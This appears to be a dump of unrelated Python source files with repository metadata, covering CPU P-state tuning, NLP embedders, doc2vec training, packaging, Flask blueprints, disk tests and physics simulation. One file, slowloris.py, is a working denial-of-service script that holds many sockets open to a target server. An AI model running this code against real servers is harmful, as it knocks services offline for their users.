|
[
"MIT"
] | 437
|
2017-04-21T21:05:07.000Z
|
2022-03-23T13:08:43.000Z
|
zenstates.py
|
musicaudience/ZenStates-Linux
|
0bc27f4740e382f2a2896dc1dabfec1d0ac96818
|
[
"MIT"
] | 14
|
2017-09-25T12:57:18.000Z
|
2021-10-03T04:48:54.000Z
|
zenstates.py
|
musicaudience/ZenStates-Linux
|
0bc27f4740e382f2a2896dc1dabfec1d0ac96818
|
[
"MIT"
] | 60
|
2018-02-03T20:56:47.000Z
|
2022-03-27T07:52:22.000Z
|
#!/usr/bin/python
import struct
import os
import glob
import argparse
pstates = range(0xC0010064, 0xC001006C)
def writemsr(msr, val, cpu = -1):
try:
if cpu == -1:
for c in glob.glob('/dev/cpu/[0-9]*/msr'):
f = os.open(c, os.O_WRONLY)
os.lseek(f, msr, os.SEEK_SET)
os.write(f, struct.pack('Q', val))
os.close(f)
else:
f = os.open('/dev/cpu/%d/msr' % (cpu), os.O_WRONLY)
os.lseek(f, msr, os.SEEK_SET)
os.write(f, struct.pack('Q', val))
os.close(f)
except:
raise OSError("msr module not loaded (run modprobe msr)")
def readmsr(msr, cpu = 0):
try:
f = os.open('/dev/cpu/%d/msr' % cpu, os.O_RDONLY)
os.lseek(f, msr, os.SEEK_SET)
val = struct.unpack('Q', os.read(f, 8))[0]
os.close(f)
return val
except:
raise OSError("msr module not loaded (run modprobe msr)")
def pstate2str(val):
if val & (1 << 63):
fid = val & 0xff
did = (val & 0x3f00) >> 8
vid = (val & 0x3fc000) >> 14
ratio = 25*fid/(12.5 * did)
vcore = 1.55 - 0.00625 * vid
return "Enabled - FID = %X - DID = %X - VID = %X - Ratio = %.2f - vCore = %.5f" % (fid, did, vid, ratio, vcore)
else:
return "Disabled"
def setbits(val, base, length, new):
return (val ^ (val & ((2 ** length - 1) << base))) + (new << base)
def setfid(val, new):
return setbits(val, 0, 8, new)
def setdid(val, new):
return setbits(val, 8, 6, new)
def setvid(val, new):
return setbits(val, 14, 8, new)
def hex(x):
return int(x, 16)
parser = argparse.ArgumentParser(description='Sets P-States for Ryzen processors')
parser.add_argument('-l', '--list', action='store_true', help='List all P-States')
parser.add_argument('-p', '--pstate', default=-1, type=int, choices=range(8), help='P-State to set')
parser.add_argument('--enable', action='store_true', help='Enable P-State')
parser.add_argument('--disable', action='store_true', help='Disable P-State')
parser.add_argument('-f', '--fid', default=-1, type=hex, help='FID to set (in hex)')
parser.add_argument('-d', '--did', default=-1, type=hex, help='DID to set (in hex)')
parser.add_argument('-v', '--vid', default=-1, type=hex, help='VID to set (in hex)')
parser.add_argument('--c6-enable', action='store_true', help='Enable C-State C6')
parser.add_argument('--c6-disable', action='store_true', help='Disable C-State C6')
args = parser.parse_args()
if args.list:
for p in range(len(pstates)):
print('P' + str(p) + " - " + pstate2str(readmsr(pstates[p])))
print('C6 State - Package - ' + ('Enabled' if readmsr(0xC0010292) & (1 << 32) else 'Disabled'))
print('C6 State - Core - ' + ('Enabled' if readmsr(0xC0010296) & ((1 << 22) | (1 << 14) | (1 << 6)) == ((1 << 22) | (1 << 14) | (1 << 6)) else 'Disabled'))
if args.pstate >= 0:
new = old = readmsr(pstates[args.pstate])
print('Current P' + str(args.pstate) + ': ' + pstate2str(old))
if args.enable:
new = setbits(new, 63, 1, 1)
print('Enabling state')
if args.disable:
new = setbits(new, 63, 1, 0)
print('Disabling state')
if args.fid >= 0:
new = setfid(new, args.fid)
print('Setting FID to %X' % args.fid)
if args.did >= 0:
new = setdid(new, args.did)
print('Setting DID to %X' % args.did)
if args.vid >= 0:
new = setvid(new, args.vid)
print('Setting VID to %X' % args.vid)
if new != old:
if not (readmsr(0xC0010015) & (1 << 21)):
print('Locking TSC frequency')
for c in range(len(glob.glob('/dev/cpu/[0-9]*/msr'))):
writemsr(0xC0010015, readmsr(0xC0010015, c) | (1 << 21), c)
print('New P' + str(args.pstate) + ': ' + pstate2str(new))
writemsr(pstates[args.pstate], new)
if args.c6_enable:
writemsr(0xC0010292, readmsr(0xC0010292) | (1 << 32))
writemsr(0xC0010296, readmsr(0xC0010296) | ((1 << 22) | (1 << 14) | (1 << 6)))
print('Enabling C6 state')
if args.c6_disable:
writemsr(0xC0010292, readmsr(0xC0010292) & ~(1 << 32))
writemsr(0xC0010296, readmsr(0xC0010296) & ~((1 << 22) | (1 << 14) | (1 << 6)))
print('Disabling C6 state')
if not args.list and args.pstate == -1 and not args.c6_enable and not args.c6_disable:
parser.print_help()
| 37.322034
| 159
| 0.572888
|
00777cd004f8fa750146dd87dceb0288d99e1c43
| 3,149
|
py
|
Python
|
allennlp/modules/token_embedders/bag_of_word_counts_token_embedder.py
|
urigoren/allennlp
|
236e1fd01ca30409cd736625901292609009f5c4
|
[
"Apache-2.0"
] | null | null | null |
allennlp/modules/token_embedders/bag_of_word_counts_token_embedder.py
|
urigoren/allennlp
|
236e1fd01ca30409cd736625901292609009f5c4
|
[
"Apache-2.0"
] | null | null | null |
allennlp/modules/token_embedders/bag_of_word_counts_token_embedder.py
|
urigoren/allennlp
|
236e1fd01ca30409cd736625901292609009f5c4
|
[
"Apache-2.0"
] | 2
|
2019-12-21T05:58:44.000Z
|
2021-08-16T07:41:21.000Z
|
import torch
from allennlp.common.checks import ConfigurationError
from allennlp.data import Vocabulary
from allennlp.modules.token_embedders.token_embedder import TokenEmbedder
from allennlp.nn.util import get_text_field_mask
@TokenEmbedder.register("bag_of_word_counts")
class BagOfWordCountsTokenEmbedder(TokenEmbedder):
"""
Represents a sequence of tokens as a bag of (discrete) word ids, as it was done
in the pre-neural days.
Each sequence gets a vector of length vocabulary size, where the i'th entry in the vector
corresponds to number of times the i'th token in the vocabulary appears in the sequence.
By default, we ignore padding tokens.
# Parameters
vocab : `Vocabulary`
vocab_namespace : `str`, optional (default = "tokens")
namespace of vocabulary to embed
projection_dim : `int`, optional (default = `None`)
if specified, will project the resulting bag of words representation
to specified dimension.
ignore_oov : `bool`, optional (default = `False`)
If true, we ignore the OOV token.
"""
def __init__(
self,
vocab: Vocabulary,
vocab_namespace: str = "tokens",
projection_dim: int = None,
ignore_oov: bool = False,
) -> None:
super().__init__()
self.vocab = vocab
self.vocab_size = vocab.get_vocab_size(vocab_namespace)
if projection_dim:
self._projection = torch.nn.Linear(self.vocab_size, projection_dim)
else:
self._projection = None
self._ignore_oov = ignore_oov
oov_token = vocab._oov_token
self._oov_idx = vocab.get_token_to_index_vocabulary(vocab_namespace).get(oov_token)
if self._oov_idx is None:
raise ConfigurationError(
"OOV token does not exist in vocabulary namespace {}".format(vocab_namespace)
)
self.output_dim = projection_dim or self.vocab_size
def get_output_dim(self):
return self.output_dim
def forward(self, inputs: torch.Tensor) -> torch.Tensor:
"""
# Parameters
inputs : `torch.Tensor`
Shape `(batch_size, timesteps, sequence_length)` of word ids
representing the current batch.
# Returns
The bag-of-words representations for the input sequence, shape
`(batch_size, vocab_size)`
"""
bag_of_words_vectors = []
mask = get_text_field_mask({"tokens": {"tokens": inputs}})
if self._ignore_oov:
# also mask out positions corresponding to oov
mask &= inputs != self._oov_idx
for document, doc_mask in zip(inputs, mask):
document = torch.masked_select(document, doc_mask)
vec = torch.bincount(document, minlength=self.vocab_size).float()
vec = vec.view(1, -1)
bag_of_words_vectors.append(vec)
bag_of_words_output = torch.cat(bag_of_words_vectors, 0)
if self._projection:
projection = self._projection
bag_of_words_output = projection(bag_of_words_output)
return bag_of_words_output
| 35.784091
| 93
| 0.659574
|
e10730a2198aaf131381c727754c5d312b1bb97a
| 4,082
|
py
|
Python
|
vectors.py
|
shivam13verma/judge-embeddings
|
9b861319a1240529d25c15799952e32dde2e894e
|
[
"MIT"
] | null | null | null |
vectors.py
|
shivam13verma/judge-embeddings
|
9b861319a1240529d25c15799952e32dde2e894e
|
[
"MIT"
] | null | null | null |
vectors.py
|
shivam13verma/judge-embeddings
|
9b861319a1240529d25c15799952e32dde2e894e
|
[
"MIT"
] | null | null | null |
import locale
import glob
import os
import os.path
import requests
import tarfile
import sys
import re
import gensim
from gensim.models.doc2vec import TaggedDocument
from collections import namedtuple
from gensim.models import Doc2Vec
import gensim.models.doc2vec
from collections import OrderedDict
import multiprocessing
from gensim.test.test_doc2vec import ConcatenatedDoc2Vec
import pickle
reload(sys)
sys.setdefaultencoding("utf-8")
dirname = '/scratch/ap4608/judge_data'
locale.setlocale(locale.LC_ALL, 'C')
# Convert text to lower-case and strip punctuation/symbols from words
def normalize_text(text):
norm_text = text.lower()
# Replace breaks with spaces
norm_text = norm_text.replace('<br />', ' ')
# Pad punctuation with spaces on both sides
for char in ['.', '"', ',', '(', ')', '!', '?', ';', ':']:
norm_text = norm_text.replace(char, ' ' + char + ' ')
return norm_text
# Concat and normalize test/train data
folders = os.listdir(dirname)
alldata = ''
for fol in folders:
temp = ''
output = fol.replace('/', '-') + '.txt'
# Is there a better pattern to use?
txt_files = glob.glob('/'.join([dirname, fol, '*.txt']))
for txt in txt_files:
with open(txt, 'r') as t:
control_chars = [chr(0x85)]
t_clean = t.read()
t_clean = t_clean.replace('\n', ' ')
t_clean = re.sub(r'[^\x00-\x7F]+',' ', t_clean)
for c in control_chars:
t_clean = t_clean.replace(c, ' ')
temp += t_clean
temp += "\n"
temp_norm = normalize_text(temp)
if len(temp_norm) == 1:
continue
with open('/'.join([dirname, output]), 'w') as n:
n.write(temp_norm)
alldata += temp_norm
with open('/'.join([dirname, 'alldata-id.txt']), 'w') as f:
for idx, line in enumerate(alldata.splitlines()):
num_line = "_*{0} {1}\n".format(idx, line)
f.write(num_line)
SentimentDocument = namedtuple('SentimentDocument', 'words tags split sentiment')
alldocs = [] # will hold all docs in original order
with open(os.path.join(dirname, 'alldata-id.txt')) as alldata:
for line_no, line in enumerate(alldata):
tokens = gensim.utils.to_unicode(line).split()
words = tokens[1:]
tags = [line_no] # `tags = [tokens[0]]` would also work at extra memory cost
split = ['train','test','extra','extra'][line_no//25000] # 25k train, 25k test, 25k extra
sentiment = [1.0, 0.0, 1.0, 0.0, None, None, None, None][line_no//12500] # [12.5K pos, 12.5K neg]*2 then unknown
alldocs.append(SentimentDocument(words, tags, split, sentiment))
train_docs = [doc for doc in alldocs if doc.split == 'train']
test_docs = [doc for doc in alldocs if doc.split == 'test']
doc_list = alldocs[:] # for reshuffling per pass
cores = multiprocessing.cpu_count()
assert gensim.models.doc2vec.FAST_VERSION > -1, "this will be painfully slow otherwise"
simple_models = [
# PV-DM w/concatenation - window=5 (both sides) approximates paper's 10-word total window size
Doc2Vec(dm=1, dm_concat=1, size=100, window=5, negative=5, hs=0, min_count=2, workers=cores),
# PV-DBOW
Doc2Vec(dm=0, size=100, negative=5, hs=0, min_count=2, workers=cores),
# PV-DM w/average
Doc2Vec(dm=1, dm_mean=1, size=100, window=10, negative=5, hs=0, min_count=2, workers=cores),
]
# speed setup by sharing results of 1st model's vocabulary scan
simple_models[0].build_vocab(alldocs) # PV-DM/concat requires one special NULL word so it serves as template
for model in simple_models[1:]:
model.reset_from(simple_models[0])
models_by_name = OrderedDict((str(model), model) for model in simple_models)
models_by_name['dbow+dmm'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[2]])
models_by_name['dbow+dmc'] = ConcatenatedDoc2Vec([simple_models[1], simple_models[0]])
# Create a document vector list and save it
doc_vec_list = [x.docvecs for x in simple_models]
pickle.dump(doc_vec_list, open('docvecs.p', 'wb'))
# pickle.dump(models_by_name, open('model.p', 'wb'))
| 31.4
| 120
| 0.66879
|
eef3daed8ab45777b3b7b176edfb2f44810328d9
| 1,883
|
py
|
Python
|
setup.py
|
kalyan1179/Automate-WhatsApp-Messages-with-Python
|
aaf4c46be1fa57776dcd2014fa5293e564a2ea4a
|
[
"MIT"
] | null | null | null |
setup.py
|
kalyan1179/Automate-WhatsApp-Messages-with-Python
|
aaf4c46be1fa57776dcd2014fa5293e564a2ea4a
|
[
"MIT"
] | null | null | null |
setup.py
|
kalyan1179/Automate-WhatsApp-Messages-with-Python
|
aaf4c46be1fa57776dcd2014fa5293e564a2ea4a
|
[
"MIT"
] | null | null | null |
from distutils.core import setup
setup(
name = 'pyAWM', # How you named your package folder (MyLib)
packages = ['pyAWM'], # Chose the same as "name"
# package_dir={'': 'C:/Users/aswanth kumar/Desktop'},
version = '1.0.1', # Start with a small number and increase it with every change you make
license='MIT', # Chose a license from here: https://help.github.com/articles/licensing-a-repository
description = 'This library automates your whatsapp messages, files, media. It Schedules your messages at given time', # Give a short description about your library
author = 'Kalyan Pavan Latchipatruni', # Type in your name
author_email = 'kaluyanpavan1179@gmail.com', # Type in your E-Mail
url = 'https://github.com/kalyan1179/Automate-WhatsApp-Messages-with-Python', # Provide either the link to your github or to your website
download_url = 'https://github.com/kalyan1179/Automate-WhatsApp-Messages-with-Python/archive/1.0.1.tar.gz', # I explain this later on
keywords = ['WHATSAPP', 'AUTOMATE', 'MESSAGE', 'AUTOMATION', 'SEND'], # Keywords that define your package best
install_requires=[ # I get to this in a second
'selenium',
],
classifiers=[
'Development Status :: 3 - Alpha', # Chose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of your package
'Intended Audience :: Developers', # Define that your audience are developers
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License', # Again, pick a license
'Programming Language :: Python :: 3', #Specify which pyhton versions that you want to support
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
| 64.931034
| 169
| 0.660117
|
45e36c19cad5c3fed20b61a6aa38b81392364cb4
| 135
|
py
|
Python
|
loga/__init__.py
|
hukkin/loga
|
5c10de42a13f8611ee84ca22122f71dbd2a27df4
|
[
"MIT"
] | 1
|
2021-04-23T17:11:25.000Z
|
2021-04-23T17:11:25.000Z
|
loga/__init__.py
|
hukkin/loga
|
5c10de42a13f8611ee84ca22122f71dbd2a27df4
|
[
"MIT"
] | 2
|
2021-07-12T22:22:08.000Z
|
2021-07-19T20:53:24.000Z
|
loga/__init__.py
|
hukkinj1/loga
|
5c10de42a13f8611ee84ca22122f71dbd2a27df4
|
[
"MIT"
] | null | null | null |
__version__ = "1.0.0" # DO NOT EDIT THIS LINE MANUALLY. LET bump2version UTILITY DO IT
from ._loga import Loga as Loga # noqa: F401
| 33.75
| 87
| 0.725926
|
09d8391fef11c2c147f17b59f71e7f2089fca844
| 569
|
py
|
Python
|
blueprints/api/receitas/blueprint.py
|
maiconandsilva/receitas
|
924aa3acbd5b24286fb2a0527c2a2e133f904937
|
[
"MIT"
] | null | null | null |
blueprints/api/receitas/blueprint.py
|
maiconandsilva/receitas
|
924aa3acbd5b24286fb2a0527c2a2e133f904937
|
[
"MIT"
] | null | null | null |
blueprints/api/receitas/blueprint.py
|
maiconandsilva/receitas
|
924aa3acbd5b24286fb2a0527c2a2e133f904937
|
[
"MIT"
] | null | null | null |
from flask import Blueprint
bp_receitas = Blueprint('receitas', __name__, url_prefix='/receitas')
bp_categorias = Blueprint('categorias', __name__, url_prefix='/categorias')
bp_ingredientes = Blueprint('ingredientes', __name__, url_prefix='/ingredientes')
bp_unidades_medida = Blueprint('unidades_medida', __name__,
url_prefix='/unidades-de-medida')
# Registra blueprints como subrotas
bp_receitas.register_blueprint(bp_categorias)
bp_receitas.register_blueprint(bp_ingredientes)
bp_ingredientes.register_blueprint(bp_unidades_medida)
| 40.642857
| 81
| 0.785589
|
73a62bdf477587e54509ce7621fd7adf1a387639
| 7,402
|
py
|
Python
|
pythainlp/ulmfit/core.py
|
wasdee/pythainlp
|
9e97321aebc104cb260f801e3b983c937f31ae01
|
[
"Apache-2.0"
] | 1
|
2021-01-13T17:59:55.000Z
|
2021-01-13T17:59:55.000Z
|
pythainlp/ulmfit/core.py
|
prrssr/pythainlp
|
19ff3510a73dd93515fcc1b4485326a8b7172026
|
[
"Apache-2.0"
] | null | null | null |
pythainlp/ulmfit/core.py
|
prrssr/pythainlp
|
19ff3510a73dd93515fcc1b4485326a8b7172026
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Universal Language Model Fine-tuning for Text Classification (ULMFiT).
"""
import collections
from typing import Callable, Collection
import numpy as np
import torch
from pythainlp.corpus import get_corpus_path
from pythainlp.tokenize import THAI2FIT_TOKENIZER
from pythainlp.ulmfit.preprocess import (
fix_html,
lowercase_all,
remove_space,
replace_rep_after,
replace_rep_nonum,
replace_url,
replace_wrep_post,
replace_wrep_post_nonum,
rm_brackets,
rm_useless_newlines,
rm_useless_spaces,
spec_add_spaces,
ungroup_emoji,
)
from pythainlp.util import reorder_vowels
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
_MODEL_NAME_LSTM = "wiki_lm_lstm"
_ITOS_NAME_LSTM = "wiki_itos_lstm"
# Pretrained model paths
THWIKI_LSTM = dict(
wgts_fname=get_corpus_path(_MODEL_NAME_LSTM),
itos_fname=get_corpus_path(_ITOS_NAME_LSTM),
)
# Preprocessing rules for Thai text
# dense features
pre_rules_th = [
replace_rep_after,
fix_html,
reorder_vowels,
spec_add_spaces,
rm_useless_spaces,
rm_useless_newlines,
rm_brackets,
replace_url,
]
post_rules_th = [replace_wrep_post, ungroup_emoji, lowercase_all]
# sparse features
pre_rules_th_sparse = pre_rules_th[1:] + [replace_rep_nonum]
post_rules_th_sparse = post_rules_th[1:] + [
replace_wrep_post_nonum,
remove_space,
]
def process_thai(
text: str,
pre_rules: Collection = pre_rules_th_sparse,
tok_func: Callable = THAI2FIT_TOKENIZER.word_tokenize,
post_rules: Collection = post_rules_th_sparse,
) -> Collection[str]:
"""
Process Thai texts for models (with sparse features as default)
:param str text: text to be cleaned
:param list[func] pre_rules: rules to apply before tokenization.
:param func tok_func: tokenization function (by default, **tok_func** is
:func:`pythainlp.tokenize.word_tokenize`)
:param list[func] post_rules: rules to apply after tokenizations
:return: a list of cleaned tokenized texts
:rtype: list[str]
:Note:
- The default **pre-rules** consists of :func:`fix_html`,
:func:`pythainlp.util.normalize`,
:func:`spec_add_spaces`,
:func:`rm_useless_spaces`,
:func:`rm_useless_newlines`,
:func:`rm_brackets`
and :func:`replace_rep_nonum`.
- The default **post-rules** consists of :func:`ungroup_emoji`,
:func:`lowercase_all`, :func:`replace_wrep_post_nonum`,
and :func:`remove_space`.
:Example:
1. Use default pre-rules and post-rules:
>>> from pythainlp.ulmfit import process_thai
>>> text = "บ้านนนนน () อยู่นานนานนาน 😂🤣😃😄😅 PyThaiNLP amp; "
>>> process_thai(text)
[บ้าน', 'xxrep', ' ', 'อยู่', 'xxwrep', 'นาน', '😂', '🤣',
'😃', '😄', '😅', 'pythainlp', '&']
2. Modify pre_rules and post_rules arugments with
rules provided in :mod:`pythainlp.ulmfit`:
>>> from pythainlp.ulmfit import (
process_thai,
replace_rep_after,
fix_html,
ungroup_emoji,
replace_wrep_post,
remove_space)
>>>
>>> text = "บ้านนนนน () อยู่นานนานนาน 😂🤣😃😄😅 PyThaiNLP amp; "
>>> process_thai(text,
pre_rules=[replace_rep_after, fix_html],
post_rules=[ungroup_emoji,
replace_wrep_post,
remove_space]
)
['บ้าน', 'xxrep', '5', '()', 'อยู่', 'xxwrep', '2', 'นาน', '😂', '🤣',
'😃', '😄', '😅', 'PyThaiNLP', '&']
"""
res = text
for rule in pre_rules:
res = rule(res)
res = tok_func(res)
for rule in post_rules:
res = rule(res)
return res
def document_vector(text: str, learn, data, agg: str = "mean"):
"""
This function vectorize Thai input text into a 400 dimension vector using
:class:`fastai` language model and data bunch.
:meth: `document_vector` get document vector using fastai language model
and data bunch
:param str text: text to be vectorized with :class:`fastai` language model.
:param learn: :class:`fastai` language model learner
:param data: :class:`fastai` data bunch
:param str agg: name of aggregation methods for word embeddings
The avialable methods are "mean" and "sum"
:return: :class:`numpy.array` of document vector sized 400 based on
the encoder of the model
:rtype: :class:`numpy.ndarray((1, 400))`
:Example:
>>> from pythainlp.ulmfit import document_vectorr
>>> from fastai import *
>>> from fastai.text import *
>>>
>>> # Load Data Bunch
>>> data = load_data(MODEL_PATH, 'thwiki_lm_data.pkl')
>>>
>>> # Initialize language_model_learner
>>> config = dict(emb_sz=400, n_hid=1550, n_layers=4, pad_token=1,
qrnn=False, tie_weights=True, out_bias=True, output_p=0.25,
hidden_p=0.1, input_p=0.2, embed_p=0.02, weight_p=0.15)
>>> trn_args = dict(drop_mult=0.9, clip=0.12, alpha=2, beta=1)
>>> learn = language_model_learner(data, AWD_LSTM, config=config,
pretrained=False, **trn_args)
>>> document_vector('วันนี้วันดีปีใหม่', learn, data)
:See Also:
* A notebook showing how to train `ulmfit` language model and its
usage, `Jupyter Notebook \
<https://github.com/cstorm125/thai2fit/blob/master/thwiki_lm/word2vec_examples.ipynb>`_
"""
s = THAI2FIT_TOKENIZER.word_tokenize(text)
t = torch.tensor(data.vocab.numericalize(s), requires_grad=False).to(
device
)
m = learn.model[0].encoder.to(device)
res = m(t).cpu().detach().numpy()
if agg == "mean":
res = res.mean(0)
elif agg == "sum":
res = res.sum(0)
else:
raise ValueError("Aggregate by mean or sum")
return res
def merge_wgts(em_sz, wgts, itos_pre, itos_new):
"""
This function is to insert new vocab into an existing model named `wgts`
and update the model's weights for new vocab with the average embedding.
:meth: `merge_wgts` insert pretrained weights and vocab into a new set
of weights and vocab; use average if vocab not in pretrained vocab
:param int em_sz: embedding size
:param wgts: torch model weights
:param list itos_pre: pretrained list of vocab
:param list itos_new: list of new vocab
:return: merged torch model weights
"""
vocab_size = len(itos_new)
enc_wgts = wgts["0.encoder.weight"].numpy()
# Average weight of encoding
row_m = enc_wgts.mean(0)
stoi_pre = collections.defaultdict(
lambda: -1, {v: k for k, v in enumerate(itos_pre)}
)
# New embedding based on classification dataset
new_w = np.zeros((vocab_size, em_sz), dtype=np.float32)
for i, w in enumerate(itos_new):
r = stoi_pre[w]
# Use pretrianed embedding if present; else use the average
new_w[i] = enc_wgts[r] if r >= 0 else row_m
wgts["0.encoder.weight"] = torch.tensor(new_w)
wgts["0.encoder_dp.emb.weight"] = torch.tensor(np.copy(new_w))
wgts["1.decoder.weight"] = torch.tensor(np.copy(new_w))
return wgts
| 31.632479
| 97
| 0.630775
|
56f174adde895a512b0ba5286ab22010776c0838
| 1,561
|
py
|
Python
|
python_attacks/slowloris.py
|
mfranceschi/psat-crisis-management
|
c6b4d65720b7820e179336b6e28332502cd54cb1
|
[
"MIT"
] | null | null | null |
python_attacks/slowloris.py
|
mfranceschi/psat-crisis-management
|
c6b4d65720b7820e179336b6e28332502cd54cb1
|
[
"MIT"
] | null | null | null |
python_attacks/slowloris.py
|
mfranceschi/psat-crisis-management
|
c6b4d65720b7820e179336b6e28332502cd54cb1
|
[
"MIT"
] | null | null | null |
import socket, random, time
# Source: https://github.com/adrianchifor/pyslowloris
headers = [
"User-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Accept-language: en-US,en"
]
sockets = []
def setupSocket(ip):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.settimeout(4)
sock.connect((ip, 80))
sock.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 1337)).encode("utf-8"))
for header in headers:
sock.send("{}\r\n".format(header).encode("utf-8"))
return sock
def run_slow_loris(ip: str, nb_sockets: int=500):
print("Starting DoS attack on {}. Connecting to {} sockets.".format(ip, nb_sockets))
for _ in range(nb_sockets):
try:
print("Socket {}".format(_))
sock = setupSocket(ip)
except socket.error:
break
sockets.append(sock)
while True:
print("Connected to {} sockets. Sending headers...".format(len(sockets)))
for sock in list(sockets):
try:
sock.send("X-a: {}\r\n".format(random.randint(1, 4600)).encode("utf-8"))
except socket.error:
sockets.remove(sock)
for _ in range(nb_sockets - len(sockets)):
print("Re-opening closed sockets...")
try:
sock = setupSocket(ip)
if sock:
sockets.append(sock)
except socket.error:
break
time.sleep(15)
| 28.907407
| 139
| 0.577194
|
d54269a690ac2cacf02a36e04017a71d95301f8d
| 2,627
|
py
|
Python
|
tests/mac/macdisk/test_representing_internal_corestorage_volume.py
|
Abd-Elrazek/InQRy
|
ab9d19a737a41673e8dcc419d49ca0e96476d560
|
[
"MIT"
] | 37
|
2017-05-12T02:32:26.000Z
|
2019-05-03T14:43:08.000Z
|
tests/mac/macdisk/test_representing_internal_corestorage_volume.py
|
Abd-Elrazek/InQRy
|
ab9d19a737a41673e8dcc419d49ca0e96476d560
|
[
"MIT"
] | 11
|
2017-08-27T03:36:18.000Z
|
2018-10-28T01:31:12.000Z
|
tests/mac/macdisk/test_representing_internal_corestorage_volume.py
|
Abd-Elrazek/InQRy
|
ab9d19a737a41673e8dcc419d49ca0e96476d560
|
[
"MIT"
] | 15
|
2019-06-13T11:29:12.000Z
|
2022-02-28T06:40:14.000Z
|
from inqry.system_specs import macdisk
DISKUTIL_OUTPUT = ''' Device Identifier: disk1
Device Node: /dev/disk1
Whole: Yes
Part of Whole: disk1
Device / Media Name: APPLE SSD AP0256J
Volume Name: Macintosh HD
Mounted: Yes
Mount Point: /
Content (IOContent): Apple_HFS
File System Personality: Journaled HFS+
Type (Bundle): hfs
Name (User Visible): Mac OS Extended (Journaled)
Journal: Journal size 24576 KB at offset 0xfa0000
Owners: Enabled
OS Can Be Installed: Yes
Recovery Disk: disk0s3
Media Type: Generic
Protocol: PCI-Express
SMART Status: Not Supported
Volume UUID: BFDDBF0E-8AAC-30F3-9D51-FD9FB55A8324
Disk / Partition UUID: FE0F6BFA-AC2D-4395-B3B2-64C57F379F67
Disk Size: 249.7 GB (249664372736 Bytes) (exactly 487625728 512-Byte-Units)
Device Block Size: 4096 Bytes
Volume Total Space: 249.7 GB (249664372736 Bytes) (exactly 487625728 512-Byte-Units)
Volume Used Space: 193.8 GB (193815617536 Bytes) (exactly 378546128 512-Byte-Units) (77.6%)
Volume Available Space: 55.8 GB (55848755200 Bytes) (exactly 109079600 512-Byte-Units) (22.4%)
Allocation Block Size: 4096 Bytes
Read-Only Media: No
Read-Only Volume: No
Device Location: Internal
Removable Media: Fixed
Solid State: Yes
Virtual: Yes
OS 9 Drivers: No
Low Level Format: Not supported
This disk is a Core Storage Logical Volume (LV). Core Storage Information:
LV UUID: FE0F6BFA-AC2D-4395-B3B2-64C57F379F67
LVF UUID: DA6A0D85-F308-41D5-95BA-9774B0A3A713
LVG UUID: 14494031-E586-49C0-8A48-BEBDAFF2548A
PV UUID (disk): F93B31BC-3637-4AA6-8E28-441F155E687C (disk0s2)
Fusion Drive: No
Encrypted: No
'''
test_disk = macdisk.create_from_diskutil_output(DISKUTIL_OUTPUT)
def test_disk_is_internal():
assert test_disk.is_internal
def test_disk_is_virtual():
assert test_disk.is_virtual()
def test_device_name_is_correct():
assert test_disk.device_name == 'APPLE SSD AP0256J'
def test_disk_is_ssd():
assert test_disk.is_ssd
def test_size_is_correct():
assert test_disk.size == '249.7 GB'
def test_removable_media():
assert test_disk.removable_media == 'Fixed'
| 32.432099
| 101
| 0.610582
|
5bd9458dbc14d8863a84699e77eb0680609ee6f4
| 6,968
|
py
|
Python
|
nanopores/scripts/calculate_forces.py
|
jhwnkim/nanopores
|
98b3dbb5d36464fbdc03f59d224d38e4255324ce
|
[
"MIT"
] | 8
|
2016-09-07T01:59:31.000Z
|
2021-03-06T12:14:31.000Z
|
nanopores/scripts/calculate_forces.py
|
jhwnkim/nanopores
|
98b3dbb5d36464fbdc03f59d224d38e4255324ce
|
[
"MIT"
] | null | null | null |
nanopores/scripts/calculate_forces.py
|
jhwnkim/nanopores
|
98b3dbb5d36464fbdc03f59d224d38e4255324ce
|
[
"MIT"
] | 4
|
2017-12-06T17:43:01.000Z
|
2020-05-01T05:41:14.000Z
|
''' calculate forces on molecule depending on midpoint '''
#from petsc4py import PETSc
#from mpi4py import MPI
#comm = PETSc.Comm(MPI.COMM_SELF)
from nanopores import *
from dolfin import *
comm = mpi_comm_self()
import sys, argparse, math, os, mpi4py
# general parameters
r = 0.55 # [nm]
q = -2. # [q*C]
dnaqsdamp = 0.1
bV0 = 0.01
z = 7.5 # [nm]
newtondamp = 1.0
new_mesh = True
# geo parameters 3D
geo_name = "H_cyl_geo"
nm = import_vars("nanopores.geometries.%s.params_geo" %geo_name)["nm"]
params = dict(
rMolecule = 0.55*nm,
#moleculeblayer = True,
)
# geo parameters 2D
geo_name2D = "H_geo"
nm = 1e-9
params2D = dict(
rMolecule = 0.55*nm,
moleculeblayer = True,
boxfields = True,
)
# physical parameters (2D + 3D)
phys_params = dict(
Membraneqs = -0.,
#bV = 0.01,
Qmol = q*qq,
bulkcon = 3e2,
#uppermbias = 1.,
#lowermbias = -.02,
dnaqsdamp = dnaqsdamp,
couplebVtoQmol = True,
bV0 = bV0,
)
IllposedNonlinearSolver.newtondamp = newtondamp
#set_log_level(PROGRESS)
# solver parameters 3D
default_maxcells = 16e4
PNPS.imax = 50
PNPS.tolnewton = 1e0
#PNPProblem.method["kparams"]["monitor_convergence"] = True
PNPProblem.method["kparams"]["maximum_iterations"] = 600
#PNPProblem.method["kparams"]["error_on_nonconvergence"] = False
#PNPProblem.method["iterative"] = False
PNPProblem.method["kparams"]["absolute_tolerance"] = PNPS.tolnewton*1e-3
PNPProblem.method["kparams"]["relative_tolerance"] = 1e-8
StokesProblemEqualOrder.method["iterative"] = False
StokesProblemEqualOrder.method["kparams"]["absolute_tolerance"] = PNPS.tolnewton*1e-3
#StokesProblemEqualOrder.method["kparams"]["monitor_convergence"] = True
#LinearPBProblem.method["kparams"]["monitor_convergence"] = True
PoissonProblem.method["kparams"]["relative_tolerance"] = 1e-6
LinearPBProblem.method["kparams"]["relative_tolerance"] = 1e-6
# solver parameters 2D
default_maxcells2D = 12e4
PNPSAxisym.tolnewton = 1e0
